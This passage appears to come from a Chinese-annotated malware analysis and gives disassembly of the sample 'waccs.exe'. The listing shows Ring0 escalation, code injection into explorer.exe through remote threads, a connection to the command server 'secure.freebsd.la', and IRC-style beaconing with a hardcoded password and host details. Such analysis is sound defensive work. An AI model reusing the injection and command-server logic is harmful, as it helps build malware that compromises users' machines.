调用ZwSystemDebugControl进入Ring0. 004064D5 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064D8 2B42 08 SUB EAX,DWORD PTR DS:[EDX+8] 004064DB 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 004064DE 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 004064E1 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 004064E4 0348 08 ADD ECX,DWORD PTR DS:[EAX+8] 004064E7 51 PUSH ECX 004064E8 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064EB 8B0A MOV ECX,DWORD PTR DS:[EDX] 004064ED E8 E6F8FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 004064F2 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 004064F5 2B41 08 SUB EAX,DWORD PTR DS:[ECX+8] 004064F8 8945 EC MOV DWORD PTR SS:[EBP-14],EAX 004064FB 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064FE 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 00406501 0342 0C ADD EAX,DWORD PTR DS:[EDX+C] 00406504 50 PUSH EAX 00406505 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406508 8B09 MOV ECX,DWORD PTR DS:[ECX] 0040650A E8 C9F8FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 0040650F 3B45 08 CMP EAX,DWORD PTR SS:[EBP+8] 00406512 0F85 82000000 JNZ waccs.0040659A 00406518 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040651B 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14] 0040651E 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 00406521 50 PUSH EAX 00406522 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406525 8B55 E8 MOV EDX,DWORD PTR SS:[EBP-18] 00406528 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040652B 52 PUSH EDX 0040652C 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 0040652F 8B08 MOV ECX,DWORD PTR DS:[EAX] 00406531 E8 C6F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406536 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406539 8B55 E8 MOV EDX,DWORD PTR SS:[EBP-18] 0040653C 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040653F 52 PUSH EDX 00406540 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406543 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8] 00406546 8B55 EC MOV EDX,DWORD PTR SS:[EBP-14] 00406549 8D440A 04 LEA EAX,DWORD PTR DS:[EDX+ECX+4] 0040654D 50 PUSH EAX 0040654E 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406551 8B09 MOV ECX,DWORD PTR DS:[ECX] 00406553 E8 A4F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406558 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040655B 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 0040655E 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 00406561 50 PUSH EAX 00406562 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406565 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 00406568 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040656B 52 PUSH EDX 0040656C 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 0040656F 8B08 MOV ECX,DWORD PTR DS:[EAX] 00406571 E8 86F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406576 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406579 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8] 0040657C 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040657F 52 PUSH EDX 00406580 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406583 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8] 00406586 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 00406589 8D440A 04 LEA EAX,DWORD PTR DS:[EDX+ECX+4] 0040658D 50 PUSH EAX 0040658E 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406591 8B09 MOV ECX,DWORD PTR DS:[ECX] 00406593 E8 64F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406598 EB 0C JMP SHORT waccs.004065A6 0040659A 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10] 0040659D 3B55 F4 CMP EDX,DWORD PTR SS:[EBP-C] 004065A0 ^ 0F85 15FFFFFF JNZ waccs.004064BB 004065A6 8BE5 MOV ESP,EBP 004065A8 5D POP EBP 004065A9 C2 0400 RETN 4 ; 返回. 向系统桌面程序“explorer.exe”进程内存空间中注入恶意代码，执行进程守护功能： 00405510 55 PUSH EBP 00405511 8BEC MOV EBP,ESP 00405513 81EC FC020000 SUB ESP,2FC 00405519 57 PUSH EDI 0040551A B8 D993A38B MOV EAX,8BA393D9 0040551F 50 PUSH EAX 00405520 8D8D 6CFDFFFF LEA ECX,DWORD PTR SS:[EBP-294] 00405526 E8 D5030000 CALL waccs.00405900 ; ASCII "kernel32.dll" 0040552B 50 PUSH EAX ; /pModule = "kernel32.dll" 0040552C FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA 00405532 8985 7CFDFFFF MOV DWORD PTR SS:[EBP-284],EAX 00405538 8D8D 6CFDFFFF LEA ECX,DWORD PTR SS:[EBP-294] 0040553E E8 FD020000 CALL waccs.00405840 ; 清除内存数据. 00405543 B9 C2A545F2 MOV ECX,F245A5C2 00405548 51 PUSH ECX 00405549 8D8D 60FDFFFF LEA ECX,DWORD PTR SS:[EBP-2A0] 0040554F E8 2C040000 CALL waccs.00405980 ; ASCII "CloseHandle" 00405554 50 PUSH EAX ; /ProcNameOrOrdinal = "CloseHandle" 00405555 8B95 7CFDFFFF MOV EDX,DWORD PTR SS:[EBP-284] 0040555B 52 PUSH EDX ; \|hModule = 7C800000 (kernel32) 0040555C FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 00405562 8985 80FDFFFF MOV DWORD PTR SS:[EBP-280],EAX 00405568 8D8D 60FDFFFF LEA ECX,DWORD PTR SS:[EBP-2A0] 0040556E E8 9D020000 CALL waccs.00405810 ; 清除内存数据. 00405573 68 22F85E60 PUSH 605EF822 00405578 8D8D 54FDFFFF LEA ECX,DWORD PTR SS:[EBP-2AC] 0040557E E8 7D040000 CALL waccs.00405A00 ; ASCII "CreateFileA" 00405583 50 PUSH EAX ; /ProcNameOrOrdinal = "CreateFileA" 00405584 8B85 7CFDFFFF MOV EAX,DWORD PTR SS:[EBP-284] 0040558A 50 PUSH EAX ; \|hModule = 7C800000 (kernel32) 0040558B FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 00405591 8985 84FDFFFF MOV DWORD PTR SS:[EBP-27C],EAX 00405597 8D8D 54FDFFFF LEA ECX,DWORD PTR SS:[EBP-2AC] 0040559D E8 6E020000 CALL waccs.00405810 ; 清除内存数据. 004055A2 68 2C150011 PUSH 1100152C 004055A7 8D8D 44FDFFFF LEA ECX,DWORD PTR SS:[EBP-2BC] 004055AD E8 CE040000 CALL waccs.00405A80 ; ASCII "CreateMutexA" 004055B2 50 PUSH EAX ; /ProcNameOrOrdinal = "CreateMutexA" 004055B3 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 004055B9 51 PUSH ECX ; \|hModule = 7C800000 (kernel32) 004055BA FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 004055C0 8985 88FDFFFF MOV DWORD PTR SS:[EBP-278],EAX 004055C6 8D8D 44FDFFFF LEA ECX,DWORD PTR SS:[EBP-2BC] 004055CC E8 6F020000 CALL waccs.00405840 ; 清除内存数据. 004055D1 BA EE438A84 MOV EDX,848A43EE 004055D6 52 PUSH EDX 004055D7 8D8D 34FDFFFF LEA ECX,DWORD PTR SS:[EBP-2CC] 004055DD E8 1E050000 CALL waccs.00405B00 ; ASCII "GetLastError" 004055E2 50 PUSH EAX ; /ProcNameOrOrdinal = "GetLastError" 004055E3 8B85 7CFDFFFF MOV EAX,DWORD PTR SS:[EBP-284] 004055E9 50 PUSH EAX ; \|hModule = 7C800000 (kernel32) 004055EA FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 004055F0 8985 8CFDFFFF MOV DWORD PTR SS:[EBP-274],EAX 004055F6 8D8D 34FDFFFF LEA ECX,DWORD PTR SS:[EBP-2CC] 004055FC E8 3F020000 CALL waccs.00405840 ; 清除内存数据. 00405601 68 EF642F4B PUSH 4B2F64EF 00405606 8D8D 24FDFFFF LEA ECX,DWORD PTR SS:[EBP-2DC] 0040560C E8 6F050000 CALL waccs.00405B80 ; ASCII "ReleaseMutex" 00405611 50 PUSH EAX ; /ProcNameOrOrdinal = "ReleaseMutex" 00405612 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 00405618 51 PUSH ECX ; \|hModule = 7C800000 (kernel32) 00405619 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040561F 8985 90FDFFFF MOV DWORD PTR SS:[EBP-270],EAX 00405625 8D8D 24FDFFFF LEA ECX,DWORD PTR SS:[EBP-2DC] 0040562B E8 10020000 CALL waccs.00405840 ; 清除内存数据. 00405630 68 C0DE9D2B PUSH 2B9DDEC0 00405635 8D8D 1CFDFFFF LEA ECX,DWORD PTR SS:[EBP-2E4] 0040563B E8 C0050000 CALL waccs.00405C00 ; ASCII "Sleep" 00405640 50 PUSH EAX ; /ProcNameOrOrdinal = "Sleep" 00405641 8B95 7CFDFFFF MOV EDX,DWORD PTR SS:[EBP-284] 00405647 52 PUSH EDX ; \|hModule = 7C800000 (kernel32) 00405648 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040564E 8985 94FDFFFF MOV DWORD PTR SS:[EBP-26C],EAX 00405654 8D8D 1CFDFFFF LEA ECX,DWORD PTR SS:[EBP-2E4] 0040565A E8 11020000 CALL waccs.00405870 ; 清除内存数据. 0040565F B8 193BE6A9 MOV EAX,A9E63B19 00405664 50 PUSH EAX 00405665 8D8D 14FDFFFF LEA ECX,DWORD PTR SS:[EBP-2EC] 0040566B E8 10060000 CALL waccs.00405C80 ; ASCII "WinExec" 00405670 50 PUSH EAX ; /ProcNameOrOrdinal = "WinExec" 00405671 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 00405677 51 PUSH ECX ; \|hModule = 7C800000 (kernel32) 00405678 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040567E 8985 98FDFFFF MOV DWORD PTR SS:[EBP-268],EAX 00405684 8D8D 14FDFFFF LEA ECX,DWORD PTR SS:[EBP-2EC] 0040568A E8 11020000 CALL waccs.004058A0 ; 清除内存数据. 0040568F B9 51000000 MOV ECX,51 00405694 33C0 XOR EAX,EAX 00405696 8DBD 9CFDFFFF LEA EDI,DWORD PTR SS:[EBP-264] 0040569C F3:AB REP STOS DWORD PTR ES:[EDI] 0040569E 8D95 E8FEFFFF LEA EDX,DWORD PTR SS:[EBP-118] 004056A4 52 PUSH EDX 004056A5 6A 00 PUSH 0 004056A7 B8 E4CE3489 MOV EAX,8934CEE4 004056AC 50 PUSH EAX 004056AD 8D8D 04FDFFFF LEA ECX,DWORD PTR SS:[EBP-2FC] 004056B3 E8 48060000 CALL waccs.00405D00 ; ASCII "Shell_TrayWnd" 004056B8 50 PUSH EAX ; ASCII "Shell_TrayWnd" 004056B9 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA(寻找"Shell_TrayWnd"窗口，该窗口进程名为“explorer.exe”，是系统桌面程序). 004056BF 50 PUSH EAX 004056C0 FF15 A8814000 CALL DWORD PTR DS:[4081A8] ; USER32.GetWindowThreadProcessId(获取进程ID). 004056C6 8D8D 04FDFFFF LEA ECX,DWORD PTR SS:[EBP-2FC] 004056CC E8 FF010000 CALL waccs.004058D0 ; 清除内存数据. 004056D1 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118] 004056D7 51 PUSH ECX 004056D8 6A 00 PUSH 0 004056DA 68 FF0F1F00 PUSH 1F0FFF ; Access = PROCESS_ALL_ACCESS 004056DF FF15 48804000 CALL DWORD PTR DS:[408048] ; kernel32.OpenProcess(打开系统桌面程序“explorer.exe”进程). 004056E5 8985 E4FEFFFF MOV DWORD PTR SS:[EBP-11C],EAX 004056EB 83BD E4FEFFFF 0>CMP DWORD PTR SS:[EBP-11C],0 004056F2 75 07 JNZ SHORT waccs.004056FB 004056F4 33C0 XOR EAX,EAX 004056F6 E9 10010000 JMP waccs.0040580B ; 如果打开系统桌面程序“explorer.exe”进程失败则退出(返回)该函数. 004056FB 68 03010000 PUSH 103 00405700 8D95 F4FEFFFF LEA EDX,DWORD PTR SS:[EBP-10C] 00405706 52 PUSH EDX 00405707 6A 00 PUSH 0 00405709 FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA(获取程序自身路径名). 0040570F 68 03010000 PUSH 103 ; /maxlen = 103 (259.) 00405714 8D85 F4FEFFFF LEA EAX,DWORD PTR SS:[EBP-10C] 0040571A 50 PUSH EAX ; \|src = "C:\WINDOWS\system32\waccs.exe" 0040571B 8D8D 9CFDFFFF LEA ECX,DWORD PTR SS:[EBP-264] 00405721 51 PUSH ECX ; \|dest = 0012F56C 00405722 E8 75190000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00405727 83C4 0C ADD ESP,0C 0040572A 6A 3F PUSH 3F ; /maxlen = 3F (63.) 0040572C 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 0040572F 52 PUSH EDX ; \|src = "t3x0" 00405730 8D85 A0FEFFFF LEA EAX,DWORD PTR SS:[EBP-160] 00405736 50 PUSH EAX ; \|dest = 0012F670 00405737 E8 60190000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 0040573C 83C4 0C ADD ESP,0C 0040573F 6A 04 PUSH 4 00405741 68 00100000 PUSH 1000 00405746 68 60010000 PUSH 160 0040574B 6A 00 PUSH 0 0040574D 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] 00405753 51 PUSH ECX 00405754 FF15 4C804000 CALL DWORD PTR DS:[40804C] ; kernel32.VirtualAllocEx(在目标进程“explorer.exe”中申请内存). 0040575A 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 0040575D 8D95 F0FEFFFF LEA EDX,DWORD PTR SS:[EBP-110] 00405763 52 PUSH EDX ; /pBytesWritten = 0012F6C0 00405764 68 60010000 PUSH 160 ; \|BytesToWrite = 160 (352.) 00405769 8D85 80FDFFFF LEA EAX,DWORD PTR SS:[EBP-280] 0040576F 50 PUSH EAX ; \|Buffer = 0012F550 00405770 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 00405773 51 PUSH ECX ; \|Address = 1460000 00405774 8B95 E4FEFFFF MOV EDX,DWORD PTR SS:[EBP-11C] 0040577A 52 PUSH EDX ; \|hProcess = 000000A4 (window) 0040577B FF15 50804000 CALL DWORD PTR DS:[408050] ; kernel32.WriteProcessMemory(向目标进程“explorer.exe”内存空间中注入代码[数据段],代码数据在地址"0012F550"处，大小为0x160 "352."). 00405781 B8 0B554000 MOV EAX,waccs.0040550B 00405786 2D 60544000 SUB EAX,waccs.00405460 0040578B 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 0040578E 6A 40 PUSH 40 00405790 68 00100000 PUSH 1000 00405795 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8] 00405798 51 PUSH ECX 00405799 6A 00 PUSH 0 0040579B 8B95 E4FEFFFF MOV EDX,DWORD PTR SS:[EBP-11C] 004057A1 52 PUSH EDX 004057A2 FF15 4C804000 CALL DWORD PTR DS:[40804C] ; kernel32.VirtualAllocEx(在目标进程“explorer.exe”中申请内存). 004057A8 8985 E0FEFFFF MOV DWORD PTR SS:[EBP-120],EAX 004057AE 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110] 004057B4 50 PUSH EAX ; /pBytesWritten = 0012F6C0 004057B5 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8] 004057B8 51 PUSH ECX ; \|BytesToWrite = AB (171.) 004057B9 68 60544000 PUSH waccs.00405460 ; \|Buffer = waccs.00405460 004057BE 8B95 E0FEFFFF MOV EDX,DWORD PTR SS:[EBP-120] 004057C4 52 PUSH EDX ; \|Address = 1A50000 004057C5 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] 004057CB 50 PUSH EAX ; \|hProcess = 000000A4 (window) 004057CC FF15 50804000 CALL DWORD PTR DS:[408050] ; kernel32.WriteProcessMemory(向目标进程“explorer.exe”内存空间中注入代码[代码段],代码数据在地址"00405460"处，大小为0xAB "171."). 004057D2 6A 00 PUSH 0 004057D4 6A 00 PUSH 0 004057D6 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 004057D9 51 PUSH ECX 004057DA 8B95 E0FEFFFF MOV EDX,DWORD PTR SS:[EBP-120] 004057E0 52 PUSH EDX 004057E1 6A 00 PUSH 0 004057E3 6A 00 PUSH 0 004057E5 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] 004057EB 50 PUSH EAX 004057EC FF15 54804000 CALL DWORD PTR DS:[408054] ; kernel32.CreateRemoteThread(创建远程线程). 004057F2 8985 ECFEFFFF MOV DWORD PTR SS:[EBP-114],EAX 004057F8 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] 004057FE 51 PUSH ECX 004057FF FF15 58804000 CALL DWORD PTR DS:[408058] ; kernel32.CloseHandle(关闭进程句柄). 00405805 8B85 ECFEFFFF MOV EAX,DWORD PTR SS:[EBP-114] 0040580B 5F POP EDI 0040580C 8BE5 MOV ESP,EBP 0040580E 5D POP EBP 0040580F C3 RETN ; 返回. 连接骇客远程服务器"http://www.secure.freebsd.la"： 004010AA 55 PUSH EBP 004010AB 8BEC MOV EBP,ESP 004010AD 83EC 24 SUB ESP,24 004010B0 6A 06 PUSH 6 ; /Family = AF_INET 004010B2 6A 01 PUSH 1 ; \|Type = SOCK_STREAM 004010B4 6A 02 PUSH 2 ; \|Family = AF_INET 004010B6 FF15 E0814000 CALL DWORD PTR DS:[4081E0] ; WS2_32.socket 004010BC 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 004010BF 8901 MOV DWORD PTR DS:[ECX],EAX 004010C1 6A 00 PUSH 0 ; /ShowState = SW_HIDE 004010C3 68 7833E110 PUSH 10E13378 004010C8 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24] 004010CB E8 A6100000 CALL waccs.00402176 ; ASCII "ipconfig /flushdns" 004010D0 50 PUSH EAX ; \|CmdLine = "ipconfig /flushdns"(命令). 004010D1 FF15 5C804000 CALL DWORD PTR DS:[40805C] ; kernel32.WinExec(执行DOS控制台命令). 004010D7 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24] 004010DA E8 B70D0000 CALL waccs.00401E96 ; 清除内存数据. 004010DF 6A 10 PUSH 10 004010E1 6A 00 PUSH 0 004010E3 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 004010E6 50 PUSH EAX 004010E7 E8 4E5F0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 004010EC 83C4 0C ADD ESP,0C 004010EF 66:C745 F0 0200 MOV WORD PTR SS:[EBP-10],2 004010F5 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004010F8 66:8B80 8400000>MOV AX,WORD PTR DS:[EAX+84] 004010FF 50 PUSH EAX ; /NetShort = 122646 00401100 FF15 D0814000 CALL DWORD PTR DS:[4081D0] ; WS2_32.ntohs(返回一个以主机字节顺序表达的数). 00401106 66:8945 F2 MOV WORD PTR SS:[EBP-E],AX 0040110A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040110D 83C0 04 ADD EAX,4 00401110 50 PUSH EAX 00401111 E8 252B0000 CALL waccs.00403C3B ; 完成主机名到地址解析. 00401116 59 POP ECX 00401117 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 0040111A 6A 10 PUSH 10 0040111C 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 0040111F 50 PUSH EAX 00401120 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401123 FF30 PUSH DWORD PTR DS:[EAX] ; /(Socket = B4 pSockAddr = 0012F7C0 AddrLen = 10 (16.)). 00401125 FF15 CC814000 CALL DWORD PTR DS:[4081CC] ; WS2_32.connect 0040112B 83F8 FF CMP EAX,-1 0040112E 75 0F JNZ SHORT waccs.0040113F ;判断是否连通网络. 00401130 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401133 FF30 PUSH DWORD PTR DS:[EAX] 00401135 FF15 C8814000 CALL DWORD PTR DS:[4081C8] ; WS2_32.closesocket(如果连通网络，则关闭连接). 0040113B 32C0 XOR AL,AL 0040113D EB 02 JMP SHORT waccs.00401141 0040113F B0 01 MOV AL,1 00401141 C9 LEAVE 00401142 C3 RETN ; 返回. 完成主机名到地址解析： 00403C3B 55 PUSH EBP 00403C3C 8BEC MOV EBP,ESP 00403C3E 51 PUSH ECX 00403C3F 51 PUSH ECX 00403C40 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; ASCII "secure.freebsd.la" 00403C43 FF15 D4814000 CALL DWORD PTR DS:[4081D4] ; WS2_32.inet_addr 00403C49 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 00403C4C 837D FC FF CMP DWORD PTR SS:[EBP-4],-1 00403C50 75 24 JNZ SHORT waccs.00403C76 00403C52 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; /Name = "secure.freebsd.la" 00403C55 FF15 D8814000 CALL DWORD PTR DS:[4081D8] ; WS2_32.gethostbyname(完成主机名到地址解析). 00403C5B 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 00403C5E 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 00403C62 75 05 JNZ SHORT waccs.00403C69 ; 判断是否成功. 00403C64 83C8 FF OR EAX,FFFFFFFF 00403C67 EB 10 JMP SHORT waccs.00403C79 00403C69 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 00403C6C 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C] 00403C6F 8B00 MOV EAX,DWORD PTR DS:[EAX] 00403C71 8B00 MOV EAX,DWORD PTR DS:[EAX] 00403C73 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 00403C76 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00403C79 C9 LEAVE 00403C7A C3 RETN ; 返回. 查找系统中是否运行某些通讯工具(可能会利用这些通讯工具发布广告、进行自我传播以及窃取其帐号密码信息等操作)，并构造发送数据包(多种包格式/与骇客远程服务器进行秘密通信)： 00401143 55 PUSH EBP 00401144 8BEC MOV EBP,ESP 00401146 83EC 40 SUB ESP,40 00401149 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040114C 0FBE80 88000000 MOVSX EAX,BYTE PTR DS:[EAX+88] 00401153 85C0 TEST EAX,EAX 00401155 74 44 JE SHORT waccs.0040119B 00401157 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040115A 05 88000000 ADD EAX,88 0040115F 50 PUSH EAX 00401160 68 175FE19B PUSH 9BE15F17 00401165 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00401168 E8 69100000 CALL waccs.004021D6 ; ASCII "PASS %s" 0040116D 50 PUSH EAX 0040116E FF75 08 PUSH DWORD PTR SS:[EBP+8] 00401171 E8 8AFEFFFF CALL waccs.00401000 ; 构造发送数据包(格式：PASS %s). 00401176 83C4 0C ADD ESP,0C 00401179 0FB6C0 MOVZX EAX,AL 0040117C F7D8 NEG EAX 0040117E 1BC0 SBB EAX,EAX 00401180 40 INC EAX 00401181 8845 DC MOV BYTE PTR SS:[EBP-24],AL 00401184 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00401187 E8 4A0E0000 CALL waccs.00401FD6 ; 清除内存数据. 0040118C 0FB645 DC MOVZX EAX,BYTE PTR SS:[EBP-24] 00401190 85C0 TEST EAX,EAX 00401192 74 07 JE SHORT waccs.0040119B 00401194 32C0 XOR AL,AL 00401196 E9 8D000000 JMP waccs.00401228 ; 发送数据包失败则退出(返回). 0040119B FF75 08 PUSH DWORD PTR SS:[EBP+8] 0040119E E8 87000000 CALL waccs.0040122A ; 查找系统中是否运行某些通讯工具，并构造发送数据包(格式：NICK %s). 004011A3 59 POP ECX 004011A4 6A 11 PUSH 11 004011A6 6A 00 PUSH 0 004011A8 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 004011AB 50 PUSH EAX 004011AC E8 895E0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 004011B1 83C4 0C ADD ESP,0C 004011B4 6A 08 PUSH 8 004011B6 6A 00 PUSH 0 004011B8 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 004011BB 50 PUSH EAX 004011BC E8 795E0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 004011C1 83C4 0C ADD ESP,0C 004011C4 C745 F4 1000000>MOV DWORD PTR SS:[EBP-C],10 004011CB 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] 004011CE 50 PUSH EAX 004011CF 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 004011D2 50 PUSH EAX 004011D3 FF15 60804000 CALL DWORD PTR DS:[408060] ; kernel32.GetComputerNameA(获得机器名称). 004011D9 6A 08 PUSH 8 004011DB 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 004011DE 50 PUSH EAX 004011DF E8 972A0000 CALL waccs.00403C7B ; 获取计算机系统版本号"%s-SP%d". 004011E4 59 POP ECX 004011E5 59 POP ECX 004011E6 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 004011E9 50 PUSH EAX 004011EA 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 004011ED 50 PUSH EAX 004011EE 68 D1F1AD0C PUSH 0CADF1D1 004011F3 8D4D C0 LEA ECX,DWORD PTR SS:[EBP-40] 004011F6 E8 3B100000 CALL waccs.00402236 ; ASCII "USER %s x x :%s" 004011FB 50 PUSH EAX 004011FC FF75 08 PUSH DWORD PTR SS:[EBP+8] 004011FF E8 FCFDFFFF CALL waccs.00401000 ; 并构造发送数据包(格式：USER %s x x :%s). 00401204 83C4 10 ADD ESP,10 00401207 0FB6C0 MOVZX EAX,AL 0040120A F7D8 NEG EAX 0040120C 1BC0 SBB EAX,EAX 0040120E 40 INC EAX 0040120F 8845 D0 MOV BYTE PTR SS:[EBP-30],AL 00401212 8D4D C0 LEA ECX,DWORD PTR SS:[EBP-40] 00401215 E8 1C0D0000 CALL waccs.00401F36 ; 清除内存数据. 0040121A 0FB645 D0 MOVZX EAX,BYTE PTR SS:[EBP-30] 0040121E 85C0 TEST EAX,EAX 00401220 74 04 JE SHORT waccs.00401226 00401222 32C0 XOR AL,AL 00401224 EB 02 JMP SHORT waccs.00401228 00401226 B0 01 MOV AL,1 00401228 C9 LEAVE 00401229 C3 RETN ; 返回. 构造发送数据包(格式：PASS %s)： 00401000 55 PUSH EBP 00401001 8BEC MOV EBP,ESP 00401003 81EC 08040000 SUB ESP,408 00401009 68 00040000 PUSH 400 0040100E 6A 00 PUSH 0 00401010 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401016 50 PUSH EAX 00401017 E8 1E600000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 0040101C 83C4 0C ADD ESP,0C 0040101F 8D45 10 LEA EAX,DWORD PTR SS:[EBP+10] 00401022 8985 FCFBFFFF MOV DWORD PTR SS:[EBP-404],EAX 00401028 FFB5 FCFBFFFF PUSH DWORD PTR SS:[EBP-404] ; /arglist = 0012F784 0040102E FF75 0C PUSH DWORD PTR SS:[EBP+C] ; \|format = "PASS %s" 00401031 68 00040000 PUSH 400 ; \|count = 400 (1024.) 00401036 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 0040103C 50 PUSH EAX ; \|buffer = 0012F374 0040103D E8 F25F0000 CALL waccs.00407034 ; JMP 到 msvcrt._vsnprintf 00401042 83C4 10 ADD ESP,10 00401045 83A5 FCFBFFFF 0>AND DWORD PTR SS:[EBP-404],0 0040104C 68 00040000 PUSH 400 ; /maxlen = 400 (1024.) 00401051 68 246752BF PUSH BF526724 00401056 8D8D F8FBFFFF LEA ECX,DWORD PTR SS:[EBP-408] 0040105C E8 B5100000 CALL waccs.00402116 ; ASCII "\n" 00401061 50 PUSH EAX ; \|src = "\n" 00401062 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401068 50 PUSH EAX ; \|dest = "PASS su1c1d3" 00401069 E8 C05F0000 CALL waccs.0040702E ; JMP 到 msvcrt.strncat 0040106E 83C4 0C ADD ESP,0C 00401071 8D8D F8FBFFFF LEA ECX,DWORD PTR SS:[EBP-408] 00401077 E8 820F0000 CALL waccs.00401FFE ; 清除内存数据. 0040107C 6A 00 PUSH 0 ; /Flags = 0 0040107E 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401084 50 PUSH EAX ; /s = "PASS su1c1d3\n" 00401085 E8 9E5F0000 CALL waccs.00407028 ; JMP 到 